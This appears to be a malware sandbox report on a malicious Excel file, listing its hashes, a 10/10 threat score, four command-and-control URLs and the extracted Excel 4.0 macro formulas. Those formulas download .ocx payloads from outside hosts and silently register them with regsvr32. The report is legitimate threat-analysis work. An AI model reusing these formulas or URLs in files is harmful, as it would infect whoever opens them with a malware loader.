Overview

overview

10

Static

static

10

ae72f6016f...ef.xls

windows7-x64

10

ae72f6016f...ef.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ae72f6016f8929c7780693cadfb855ef.xlsx

  • Size

    89KB

  • MD5

    ae72f6016f8929c7780693cadfb855ef

  • SHA1

    bda7fd78150a0103f3c2281d90074332ccfa8cde

  • SHA256

    9f8b5f5da718fafb98de9b2128cd81fd720a37de6c755b81965ead358aeb912a

  • SHA512

    5d0053bf1557fa4d236ddedf074562f7b86501b50c8595ecdcc44d99fe9201917e4c4649b9418cc952d4630db2bf036278e79013898e67fcd4ebe71bf6ea70e5

  • SSDEEP

    1536:n6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9a2:6k3hOdsylKlgxopeiBNhZFGzE+cL2kd7

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://bruidsfotografie-breda.nl/cache/QPk/

http://www.chawkyfrenn.com/icon/JtT/

https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/

http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bruidsfotografie-breda.nl/cache/QPk/","..\phdg1.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.chawkyfrenn.com/icon/JtT/","..\phdg2.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/","..\phdg3.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/","..\phdg4.ocx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • ae72f6016f8929c7780693cadfb855ef.xlsx
    .xls .xlsx windows office2003